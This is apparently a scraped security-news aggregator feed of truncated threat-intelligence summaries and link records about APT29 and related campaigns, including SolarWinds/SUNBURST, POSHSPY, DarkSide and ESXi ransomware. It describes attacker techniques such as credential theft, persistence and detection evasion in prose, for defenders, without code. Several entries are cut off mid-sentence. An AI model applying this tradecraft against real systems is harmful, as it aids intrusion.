ATT&CK] Permission Groups Discovery - T1069 Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates Necro Python Bots Adds New Tricks (published: June 3, 2021) Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms. Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover. MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219 Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig New SkinnyBoy Ma]]> 2021-06-08T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-teamtnt-actively-enumerating-cloud-environments-to-infiltrate-organizations-necro-python-bots-adds-new-tricks-us-seizes-domains-used-by-apt29-and-more www.secnews.physaphae.fr/article.php?IdArticle=2890622 False Ransomware,Malware,Vulnerability,Threat,Patching,Guideline APT 29,APT 28 None Security Affairs - Blog Secu 2021-06-02T07:46:43+00:00 https://securityaffairs.co/wordpress/118495/apt/doj-seized-apt29-domains.html?utm_source=rss&utm_medium=rss&utm_campaign=doj-seized-apt29-domains www.secnews.physaphae.fr/article.php?IdArticle=2867407 False None APT 29 None Bleeping Computer - Magazine Américain 2021-06-01T16:56:57+00:00 https://www.bleepingcomputer.com/news/security/us-seizes-domains-used-by-apt29-in-recent-usaid-phishing-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=2865812 False Malware APT 29 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this agazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Darkside Ransomware Caused Major US Pipeline Shutdown (published: May 8, 2021) DarkSide ransomware attack caused Colonial Pipeline to shut down the biggest US gasoline pipeline on Friday, May 7th, 2021. The pipeline is the main source of gasoline, diesel and jet fuel for the US East Coast and runs from Texas to Tennessee and New Jersey serving up to 50 Million people. DarkSide group began their attack against the company a day earlier, stealing nearly 100 gigabytes of data before locking computers with ransomware and demanding payment. Analyst Comment: While DarkSide's first known activity goes back only to August 2020, it is likely backed by experienced Eastern-European actors. Ransomware protection demands a multi-layered approach to include isolation, air-gaps, backup solutions, anti-phishing training and detection. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Inhibit System Recovery - T1490 | [MITRE ATT&CK] Scripting - T1064 Tags: DarkSide, ransomware, Oil and Gas, USA, Colonial Pipeline Revealing The 'Cnip3' Crypter, A Highly Evasive RAT Loader (published: May 7, 2021) Morphisec has discovered a new stealthy crypter as a service dubbed Snip3. Its advanced anti-detection techniques include: 1) Executing PowerShell code with the ‘remotesigned’ parameter. 2) Validating the existence of Windows Sandbox and VMWare virtualization. 3) Using Pastebin and top4top for staging. 4) Compiling RunPE loaders on the endpoint in runtime. Several hackers were observed using Snip3 to deliver various payloads: AsyncRAT, NetWire RAT, RevengeRAT, and Agent Tesla. Analyst Comment: The Snip3 Crypter’s ability to identify sandboxing and virtual environments make it especially capable of bypassing detection-centric solutions. It shows the value of investing in complex cybersecurity solutions. MITRE ATT&CK: [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Process Injection - T1055 Tags: Snip3, crypter, Crypter-as-a-Service, VBS, RAT, AsyncRAT, NetWire RAT, RevengeRAT, Agent Tesla, NYANxCAT Lemon Duck target Microsoft Exchange Servers, Incorporate New TTPs (published: May 7, 2021) The Lemon Duck cryptomining group has been active since at least]]> 2021-05-12T21:55:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-ttps-darkside-ransomware-shuts-down-us-pipeline-operation-tunnelsnake-uses-new-moriya-rootkit-and-more www.secnews.physaphae.fr/article.php?IdArticle=2776510 False Ransomware,Malware,Threat APT 29,APT 29 None Security Affairs - Blog Secu 2021-05-07T21:03:42+00:00 https://securityaffairs.co/wordpress/117667/apt/apt29-changes-ttps.html?utm_source=rss&utm_medium=rss&utm_campaign=apt29-changes-ttps www.secnews.physaphae.fr/article.php?IdArticle=2754193 False None APT 29 None ComputerWeekly - Computer Magazine 2021-05-07T10:15:00+00:00 https://www.computerweekly.com/news/252500409/NCSC-CISA-publish-new-information-on-Russias-Cozy-Bear www.secnews.physaphae.fr/article.php?IdArticle=2752285 False None APT 29,APT 29 None SecurityWeek - Security News 2021-04-27T19:33:22+00:00 http://feedproxy.google.com/~r/Securityweek/~3/npR_v4OifRk/fbidhs-issue-guidance-network-defenders-mitigate-russian-gov-hacking www.secnews.physaphae.fr/article.php?IdArticle=2704931 False Threat APT 29,APT 29 None Bleeping Computer - Magazine Américain 2021-04-26T11:16:34+00:00 https://www.bleepingcomputer.com/news/security/us-warns-of-russian-state-hackers-still-targeting-us-foreign-orgs/ www.secnews.physaphae.fr/article.php?IdArticle=2696753 False None APT 29 None ComputerWeekly - Computer Magazine 2021-04-22T10:00:00+00:00 https://www.computerweekly.com/news/252499691/Researchers-shed-more-light-on-APT29-activity-during-SolarWinds-attack www.secnews.physaphae.fr/article.php?IdArticle=2678877 False None APT 29 4.0000000000000000 AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2020 MITRE ATT&CK test - APT 29 for most total detections and most correlated alerts through comprehensive storyline technology. This autonomous agent utilizes Artificial Intelligence (AI) and machine learning (ML) to help protect against known and unknown threats and eliminates reliance on external factors for protection. This faster, “machine-speed” detection & response provides continuous protection, even when offline. And, in the event of an attack, the SentinelOne agent can perform 1-click remediation and rollback with no custom scripting or re-imaging required. Deep integration with AT&T’s USM platform and Alien Labs OTX AT&T Cybersecurity and SentinelOne bring one of the most unique combinations in the market via the deep integrations between the SentinelOne platform and the AT&T USM platform. This deep integration allows for orchestrated and automated incident response on the endpoints. Additionally, deep integrations were built between the world’s largest open threat intelligence community, AT&T Alien Labs Open Threat Exchange (OTX), and the SentinelOne agent. The AT&T Alien Labs OTX encompasses over 145,000 security professionals submitting over 20 million threat indicators per day. Additional context is provided from the USM sensor network with an additional 20 million threat observations per day and AT&T’s Chief Security Office analyzing over 446 PB of traffic from 200 countries and territories. By correlating the incidents of compromise from AT&T Alien Labs OTX, AT&T is able to deliver added context that allows for faster responses. These same AT&T Alien Labs detections and threat intelligence also informs threat hunting on SentinelOne’s EDR data to help yield richer insights and easier detection of evasive threats. Expert management As one of the world's top MSSPs, AT&T Cybersecurity employs highly experienced and industry certified individuals for the Managed Endpoint Security with SentinelOne offering. AT&T brings over 25 years of experience in delivering managed security services and knows what it takes to keep pace with the dynamic threat landscape. To stay ahead, AT&T’s security analysts maintain security certifications including GSE, CISSP, CEH, and more.  For the Managed Endpoint Security with SentinelOne offering, AT&T ]]> 2021-04-19T20:38:00+00:00 https://feeds.feedblitz.com/~/649544360/0/alienvault-blogs~Introducing-ATampT%e2%80%99s-Managed-Endpoint-Security-with-SentinelOne www.secnews.physaphae.fr/article.php?IdArticle=2668051 False Data Breach,Threat,Guideline APT 29 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2021-04-16T18:10:09+00:00 https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/ www.secnews.physaphae.fr/article.php?IdArticle=2654197 False None APT 29 None Security Affairs - Blog Secu 2021-04-16T12:26:02+00:00 https://securityaffairs.co/wordpress/116891/cyber-warfare-2/russia-svr-actively-targets-5-flaws.html?utm_source=rss&utm_medium=rss&utm_campaign=russia-svr-actively-targets-5-flaws www.secnews.physaphae.fr/article.php?IdArticle=2653026 False None APT 29 None Security Affairs - Blog Secu 2021-04-15T22:20:58+00:00 https://securityaffairs.co/wordpress/116866/cyber-warfare-2/us-sanctions-russia-solarwinds.html?utm_source=rss&utm_medium=rss&utm_campaign=us-sanctions-russia-solarwinds www.secnews.physaphae.fr/article.php?IdArticle=2649643 False Hack APT 29 None Security Affairs - Blog Secu 2021-03-07T14:54:02+00:00 https://securityaffairs.co/wordpress/115360/apt/russia-apt-lithuanian-infrastructure.html?utm_source=rss&utm_medium=rss&utm_campaign=russia-apt-lithuanian-infrastructure www.secnews.physaphae.fr/article.php?IdArticle=2448286 False Threat APT 29 None Anomali - Firm Blog get signed up today so you can receive curated and summarized cybersecurity intelligence events weekly. The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Emotet, Go, Masslogger, Mustang Panda, OilRig, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact (published: February 26, 2021) Recent reporting indicates that two prolific cybercrime threat groups, CARBON SPIDER and SPRITE SPIDER, have begun targeting ESXi, a hypervisor developed by VMWare to run and manage virtual machines. SPRITE SPIDER uses PyXie's LaZagne module to recover vCenter credentials stored in web browsers and runs Mimikatz to steal credentials from host memory. After authenticating to vCenter, SPRITE SPIDER enables ssh to permit persistent access to ESXi devices. In some cases, they also change the root account password or the host’s ssh keys. Before deploying Defray 777, SPRITE SPIDER’s ransomware of choice, they terminate running VMs to allow the ransomware to encrypt files associated with those VMs. CARBON SPIDER has traditionally targeted companies operating POS devices, with initial access being gained using low-volume phishing campaigns against this sector. But throughout 2020 they were observed shifting focus to “Big Game Hunting” with the introduction of the Darkside Ransomware. CARBON SPIDER gains access to ESXi servers using valid credentials and reportedly also logs in over ssh using the Plink utility to drop the Darkside Recommendation: Both CARBON SPIDER and SPRITE SPIDER likely intend to use ransomware targeting ESXi to inflict greater harm – and hopefully realize larger profits – than traditional ransomware operations against Windows systems. Should these campaigns continue and prove to be profitable, we would expect more threat actors to imitate these activities. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Scheduled Transfer - T1029 | ]]> 2021-03-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt-groups-cobalt-strike-russia-malware-and-more www.secnews.physaphae.fr/article.php?IdArticle=2422682 False Ransomware,Malware,Threat Wannacry,Wannacry,APT 29,APT 28,APT 31,APT 34 None Mandiant - Blog Sécu de Mandiant fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post et ce rapport est désormais attribuée à APT29. Mise à jour (28 octobre 2021): Mandiant a récemment observé des acteurs de menace ciblés utilisant l'identité EWS (via le rôle de l'impression d'application) pour maintenir un accès persistant aux boîtes aux lettres dans les environnements victimes.Une fois que l'acteur de menace a accès à ce rôle, ses abus sont difficiles à détecter et fournissent le contrôle de l'acteur de menace sur chaque boîte aux lettres d'un locataire victime.Mandiant a également observé des acteurs de menace ciblés abusant de la relation de confiance entre le cloud

---

UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post and report is now attributed to APT29. UPDATE (Oct. 28, 2021): Mandiant has recently observed targeted threat actors using EWS impersonation (via the ApplicationImpersonation role) to maintain persistent access to mailboxes in victim environments. Once the threat actor has access to this role, its abuse is hard to detect and provides the threat actor control over every mailbox in a victim tenant. Mandiant has also observed targeted threat actors abusing the trust relationship between Cloud]]> 2021-01-19T14:00:00+00:00 https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452 www.secnews.physaphae.fr/article.php?IdArticle=8377611 False Threat APT 29 4.0000000000000000 Anomali - Firm Blog state-sponsored adversary. In the case of SolarWinds, it is looking like an adversary was able to dwell in victims’ networks for as long as nine months and that the prime suspect is the Kremlin. There are undoubtedly many organizations wondering if they are caught up in the attacks, either by design or indirectly. Fortunately, those that have effective threat detection capabilities in place can utilize the information FireEye, SolarWinds, Anomali and other threat research organizations are providing to determine if they’ve been hit. Anomali customers are already ahead of the game. As soon as the world becomes aware of an attack, Anomali Threat Research immediately front-loads Anomali ThreatStream with a threat bulletin that provides a detailed and concise narrative of the situation along with a comprehensive list of the known indicators of compromise (IOCs). Once added, information relevant to the incident (IOCs, reports from the security community, signatures, etc.) are automatically delivered to customers. This gives them the ability to automate threat detection and blocking across their security controls, including EDR, firewalls, and SIEM. In addition, customers using Anomali Match, our threat detection and response product, are able to use the threat intelligence to do a retrospective search back to when the threat was active, getting real-time results showing whether the threat was seen in their network at that time. To provide threat intelligence and security operations analysts with a look at what an Anomali threat bulletin looks like, we’ve added the first version of the FireEye threat bulletin to this blog. We are happy to discuss more deeply how Anomali customers are using this information and continual updates to detect the presence of related IOCs in their environments. Reach us at general@anomali.com. To listen to a more in-depth conversation on the incident and how threat intelligence aids in detection, listen to this week’s Anomali Detect Podcast. Key Findings Unknown, sophisticated actors stole more than 300 FireEye Red Team tools and countermeasures (signatures) on an unspecified date. An unnamed source for The Washington Post claimed Cozy Bear (APT29), is responsible, but provided no evidence. Actor(s) were also interested in FireEye customers, specifically, government entities. The Red Team countermeasures consisted of custom-versions of known tools, a prioritized Common Vulnerabilities and Exposures (CVE) list, and malware signatures in ClamAV, HXIOC, Snort, and Yara languages. The stolen tools could be customized by actors, just as the FireEye Red Team did to existing tools. ]]> 2020-12-17T18:00:00+00:00 https://www.anomali.com/blog/fireeye-solarwinds-hacks-show-that-detection-is-key-to-solid-defense www.secnews.physaphae.fr/article.php?IdArticle=2108493 False Malware,Threat,Guideline APT 29 None 01net. Actualites - Securite - Magazine Francais ]]> 2020-12-15T11:01:00+00:00 https://www.01net.com/actualites/18000entreprises-et-organisations-ont-telecharge-la-backdoor-des-hackers-de-poutine-2019017.html www.secnews.physaphae.fr/article.php?IdArticle=2104485 False None APT 29,APT 19 None Network World - Magazine Info 2020-12-15T03:44:00+00:00 https://www.csoonline.com/article/3601508/solarwinds-supply-chain-attack-explained-why-organizations-were-not-prepared.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=2102784 False None APT 29 None Wired Threat Level - Security News 2020-12-14T21:36:39+00:00 https://www.wired.com/story/russia-solarwinds-supply-chain-hack-commerce-treasury www.secnews.physaphae.fr/article.php?IdArticle=2101563 False None APT 29 None Mandiant - Blog Sécu de Mandiant fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29. Résumé de l'exécutif Nous avons découvert une campagne mondiale d'intrusion.Nous suivons les acteurs derrière cette campagne sous le nom de UNC2452. Fireeye a découvert une attaque de chaîne d'approvisionnement trrojanisant les mises à jour de logiciels commerciaux de Solarwinds Orion afin de distribuer des logiciels malveillants que nous appelons Sunburst. L'activité post-compromis de l'attaquant exploite plusieurs techniques pour échapper à la détection et obscurcir leur activité, mais ces efforts offrent également quelques opportunités de détection. le

---

UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. Executive Summary We have discovered a global intrusion campaign. We are tracking the actors behind this campaign as UNC2452. FireEye discovered a supply chain attack trojanizing SolarWinds Orion business software updates in order to distribute malware we call SUNBURST.  The attacker\'s post compromise activity leverages multiple techniques to evade detection and obscure their activity, but these efforts also offer some opportunities for detection. The]]> 2020-12-13T22:00:00+00:00 https://www.mandiant.com/resources/blog/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8377613 False Malware Solardwinds,APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2020-12-13T21:44:40+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/oCAj1gqVoXA/us-agencies-and-fireeye-were-hacked.html www.secnews.physaphae.fr/article.php?IdArticle=2099547 False None APT 29 None InformationSecurityBuzzNews - Site de News Securite Experts On Russian Hackers Target Covid-19 Vaccine Research]]> 2020-07-17T11:55:00+00:00 https://www.informationsecuritybuzz.com/expert-comments/experts-on-russian-hackers-target-covid-19-vaccine-research/ www.secnews.physaphae.fr/article.php?IdArticle=1809662 False None APT 29 None InformationSecurityBuzzNews - Site de News Securite Cozy Bear Hackers Target Covid-19 Research Centres in UK, US and Canada]]> 2020-07-17T09:52:24+00:00 https://www.informationsecuritybuzz.com/expert-comments/cozy-bear-hackers-target-covid-19-research-centres-in-uk-us-and-canada/ www.secnews.physaphae.fr/article.php?IdArticle=1809551 False None APT 29 None IT Security Guru - Blog Sécurité 2020-07-17T07:54:04+00:00 https://www.itsecurityguru.org/2020/07/17/covid-19-researchers-targeted-by-russian-state-sponsored-hackers/?utm_source=rss&utm_medium=rss&utm_campaign=covid-19-researchers-targeted-by-russian-state-sponsored-hackers www.secnews.physaphae.fr/article.php?IdArticle=1809328 False None APT 29 None Security Affairs - Blog Secu 2020-07-16T14:45:58+00:00 https://securityaffairs.co/wordpress/105992/intelligence/ncsc-apt29-covid-19-vaccine.html?utm_source=rss&utm_medium=rss&utm_campaign=ncsc-apt29-covid-19-vaccine www.secnews.physaphae.fr/article.php?IdArticle=1808154 False None APT 29 None IT Security Guru - Blog Sécurité 2019-10-18T10:13:01+00:00 https://www.itsecurityguru.org/2019/10/18/russian-hackers-noticed-after-being-undetected-for-years/?utm_source=rss&utm_medium=rss&utm_campaign=russian-hackers-noticed-after-being-undetected-for-years www.secnews.physaphae.fr/article.php?IdArticle=1410802 True Malware,Threat APT 29 None InformationSecurityBuzzNews - Site de News Securite Experts Comments: Sophisticated Russian Hacking Group Is back In Action Again]]> 2019-10-17T15:33:16+00:00 https://www.informationsecuritybuzz.com/expert-comments/experts-comments-sophisticated-russian-hacking-group-is-back-in-action-again/ www.secnews.physaphae.fr/article.php?IdArticle=1409440 False None APT 29 None Dark Reading - Informationweek Branch 2019-10-17T10:45:00+00:00 https://www.darkreading.com/threat-intelligence/cozy-bear-emerges-from-hibernation-to-hack-eu-ministries/d/d-id/1336111?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple www.secnews.physaphae.fr/article.php?IdArticle=1409431 False Hack APT 29 None Bleeping Computer - Magazine Américain 2019-10-17T09:39:47+00:00 https://www.bleepingcomputer.com/news/security/cozy-bear-russian-hackers-spotted-after-staying-undetected-for-years/ www.secnews.physaphae.fr/article.php?IdArticle=1409160 False Malware,Threat APT 29 None We Live Security - Editeur Logiciel Antivirus ESET 2019-10-17T09:30:46+00:00 http://feedproxy.google.com/~r/eset/blog/~3/ThDiJoYnG-U/ www.secnews.physaphae.fr/article.php?IdArticle=1408711 False Malware APT 29 None Wired Threat Level - Security News 2019-10-17T09:30:00+00:00 https://www.wired.com/story/cozy-bear-dukes-russian-hackers-new-tricks www.secnews.physaphae.fr/article.php?IdArticle=1408770 False None APT 29 None 01net. Actualites - Securite - Magazine Francais ]]> 2019-10-17T01:21:19+00:00 https://www.01net.com/actualites/les-cyberespions-russes-s-attaquent-aux-diplomates-europeens-par-steganographie-1788751.html www.secnews.physaphae.fr/article.php?IdArticle=1410478 False None APT 29 2.0000000000000000 ZD Net - Magazine Info 2019-01-19T00:27:03+00:00 https://www.zdnet.com/article/dnc-says-russia-tried-to-hack-its-servers-again-in-november-2018/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=999405 False Hack APT 29 None Security Affairs - Blog Secu 2018-11-23T10:38:04+00:00 https://securityaffairs.co/wordpress/78353/apt/new-cozy-bear-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=913703 False Malware APT 29 None InformationSecurityBuzzNews - Site de News Securite Cozy Bear Returns With Post-Election Spear-Phishing Campaign]]> 2018-11-21T13:15:04+00:00 https://www.informationsecuritybuzz.com/expert-comments/cozy-bear-returns/ www.secnews.physaphae.fr/article.php?IdArticle=910156 False None APT 29 None UnderNews - Site de news "pirate" francais FireEye vient de publier un rapport concernant une nouvelle activité de Phishing qui aurait probablement un lien avec le groupe APT29. Ce rapport vient compléter la première découverte de FireEye, datant du 14 novembre 2018, en apportant plus de détails.]]> 2018-11-20T18:03:04+00:00 https://www.undernews.fr/reseau-securite/phishing-hoax/fireeye-publie-un-nouveau-rapport-sur-une-activite-de-phishing-probablement-liee-au-groupe-apt29.html www.secnews.physaphae.fr/article.php?IdArticle=909042 False None APT 29 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2018-11-20T18:01:01+00:00 https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/ www.secnews.physaphae.fr/article.php?IdArticle=908933 False None APT 29 None Wired Threat Level - Security News 2018-11-20T14:16:01+00:00 https://www.wired.com/story/russia-fancy-bear-hackers-phishing www.secnews.physaphae.fr/article.php?IdArticle=908650 False None APT 29,APT 28 None Mandiant - Blog Sécu de Mandiant Introduction FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting. The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon. Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29. APT29]]> 2018-11-19T22:00:00+00:00 https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign www.secnews.physaphae.fr/article.php?IdArticle=8377724 False None APT 29,APT 29 4.0000000000000000 Security Affairs - Blog Secu 2018-11-19T13:27:04+00:00 https://securityaffairs.co/wordpress/78195/apt/apt29-malware-analysis.html www.secnews.physaphae.fr/article.php?IdArticle=906670 False Malware APT 29 None Security Affairs - Blog Secu 2018-11-18T09:35:00+00:00 https://securityaffairs.co/wordpress/78161/intelligence/apt29-impersonates-state-department.html www.secnews.physaphae.fr/article.php?IdArticle=904245 False Threat APT 29 None ZD Net - Magazine Info 2018-11-16T23:40:00+00:00 https://www.zdnet.com/article/russian-apt-comes-back-to-life-with-new-us-spear-phishing-campaign/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=901452 False None APT 29 None The Last Watchdog - Blog Sécurité de Byron V Acohido 2018-02-02T21:29:09+00:00 http://www.lastwatchdog.com/news-wrap-up-dutch-spies-corroborate-russias-meddling-in-u-s-election-and-19-eu-nations/ www.secnews.physaphae.fr/article.php?IdArticle=464050 False None APT 29 None Zataz - Magazine Francais de secu Fume, c’est du Cozy Bear ! Les services de renseignement néerlandais auraient fourni des preuves cruciales à leurs homologues américains sur l’ingérence de la Russie lors des élections de 2016. Voilà qui est intéressant. Les services secrets américains ne seraient pas les auteurs des inf... Cet article Les services secrets néerlandais infiltrent Cozy Bear est apparu en premier sur ZATAZ. ]]> 2018-01-28T13:23:51+00:00 https://www.zataz.com/services-secrets-neerlandais-cozy-bear/ www.secnews.physaphae.fr/article.php?IdArticle=460841 False None APT 29 None The Security Ledger - Blog Sécurité Read the whole entry...  _!fbztxtlnk!_ https://feeds.feedblitz.com/~/520448790/0/thesecurityledger -->»]]> 2018-01-26T17:05:41+00:00 https://feeds.feedblitz.com/~/520448790/0/thesecurityledger~The-Dutch-were-spying-on-Cozy-Bear-Hackers-as-they-targeted-Democrats/ www.secnews.physaphae.fr/article.php?IdArticle=460831 False None APT 29 None Dark Reading - Informationweek Branch 2018-01-26T14:45:00+00:00 https://www.darkreading.com/attacks-breaches/dutch-intel-agency-reportedly-helped-us-attribute-dnc-hack-to-russia/d/d-id/1330921?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple www.secnews.physaphae.fr/article.php?IdArticle=461026 False None APT 29 None IT Security Guru - Blog Sécurité In 2014, Dutch intelligence agency AIVD reportedly managed to locate the hub of the Kremlin-linked hacker group Cozy Bear, also known as APT29. AIVD reportedly gained access to the state-sponsored hacker group’s networks and spied on Cozy Bear’s hacking activities in a cyberespionage campaign that is believed to have lasted between one and two and ... ]]> 2018-01-26T11:37:18+00:00 http://www.itsecurityguru.org/2018/01/26/dutch-intelligence-agency-spied-took-photos-russia-linked-cozy-bear-hackers/ www.secnews.physaphae.fr/article.php?IdArticle=460648 False None APT 29 2.0000000000000000 Security Affairs - Blog Secu 2018-01-26T10:40:29+00:00 http://securityaffairs.co/wordpress/68241/intelligence/aivd-hacked-cozy-bear.html www.secnews.physaphae.fr/article.php?IdArticle=460608 False None APT 29 None Contagio - Site d infos ransomware This is the second part of Russian APT series."APT29 - The Dukes Cozy Bear: APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008.1210 This group reportedly compromised the Democratic National Committee starting in the summer of 2015" (src.  Mitre ATT&CK)Please see the first post here: Russian APT - APT28 collection of samples including OSX XAgentI highly recommend reading and studying these resources first:Mitre ATT&CK2017-03 Disinformation. A Primer In Russian Active Measures And Influence Campaigns. Hearings before the   Select Committee on Intelligence, March 20172014-08 Mikko Hipponen. Governments as Malware Authors. Presentation ppt.2016. No Easy Breach: Challenges and Lessons from an Epic Investigation. Mandiant. Matthew Dunwoody, Nick Carr. VideoBeyond 'Cyber War': Russia's Use of Strategic Cyber Espionage and Information Operations in Ukraine. NATO Cooperative Cyber Defence Centre of Excellence/ Fireeye - Jen WeedonList of References (and samples mentioned) listed from oldest to newest:2012-02 FSecure. COZYDUKE2013-02_Crysys_Miniduke Indicators2013-04_Bitdefender_A Closer Look at MiniDuke2014-04 FSecure_Targeted Attacks and Ukraine2014-05_FSecure.Miniduke still duking it out2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke2015-04_Kaspersky_CozyDuke-CozyBear]]> 2017-04-05T22:57:33+00:00 http://contagiodump.blogspot.com/2017/03/part-ii-apt29-russian-apt-including.html www.secnews.physaphae.fr/article.php?IdArticle=358910 False None APT 29,APT 28 None SecurityWeek - Security News 2017-04-03T12:42:42+00:00 http://feedproxy.google.com/~r/Securityweek/~3/LKmUpdl9NI0/apt29-uses-stealthy-backdoor-maintain-access-targets www.secnews.physaphae.fr/article.php?IdArticle=351466 False None APT 29 None Mandiant - Blog Sécu de Mandiant Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY. POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI). In the investigations Mandiant has conducted, it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors. POSHSPY makes the most of using built-in Windows features – so-called “living off the land” – to make an especially stealthy backdoor. POSHSPY\'s use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone]]> 2017-04-03T07:00:00+00:00 https://www.mandiant.com/resources/blog/dissecting-one-ofap www.secnews.physaphae.fr/article.php?IdArticle=8377785 False Tool,Technical APT 29 4.0000000000000000 Contagio - Site d infos ransomware  This post is for all of you, Russian malware lovers/haters. Analyze it all to your heart's content. Prove or disprove Russian hacking in general or DNC hacking in particular, or find that "400 lb hacker" or  nail another country altogether.  You can also have fun and exercise your malware analysis skills without any political agenda.The post contains malware samples analyzed in the APT28 reports linked below. I will post APT29 and others later.Read about groups and types of targeted threats here: Mitre ATT&CKList of References (and samples mentioned) listed from oldest to newest:APT28_2011-09_Telus_Trojan.Win32.Sofacy.AAPT28_2014-08_MhtMS12-27_PrevenityAPT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.OperationsAPT28_2014-10_Telus_Coreshell.AAPT28_2014-10_TrendMicro Operation Pawn Storm. Using Decoys to Evade DetectionAPT28_2015-07_Digital Attack on German ParliamentAPT28_2015-07_ESET_Sednit_meet_HackingAPT28_2015-07_Telus_Trojan-Downloader.Win32.Sofacy.BAPT28_2015-09_Root9_APT28_Technical_FollowupAPT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-codeAPT28_2015-10_New Adobe Flash Zero-Day Used in Pawn StormAPT28_2015-10_Root9_APT28_targets Financial MarketsAPT28_2015-12_Bitdefender_In-depth_anal]]> 2017-03-31T02:03:28+00:00 http://contagiodump.blogspot.com/2017/02/russian-apt-apt28-collection-of-samples.html www.secnews.physaphae.fr/article.php?IdArticle=358911 False None APT 29,APT 28 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2017-03-27T20:14:12+00:00 https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/ www.secnews.physaphae.fr/article.php?IdArticle=347686 False None APT 29 None SecurityWeek - Security News 2017-03-27T14:56:43+00:00 http://feedproxy.google.com/~r/Securityweek/~3/WuZS5fGxCic/apt29-cyberspies-use-domain-fronting-evade-detection www.secnews.physaphae.fr/article.php?IdArticle=346951 False None APT 29 None Mandiant - Blog Sécu de Mandiant document détaillant ces techniques .Domain Fronting fournit des connexions de réseau sortant qui ne se distinguent pas des demandes légitimes de sites Web populaires. APT29 a utilisé le routeur d'oignon (TOR) et le plugin de façade du domaine Tor Mode pour créer un tunnel réseau crypté caché qui semblait se connecter aux services Google sur TLS

---

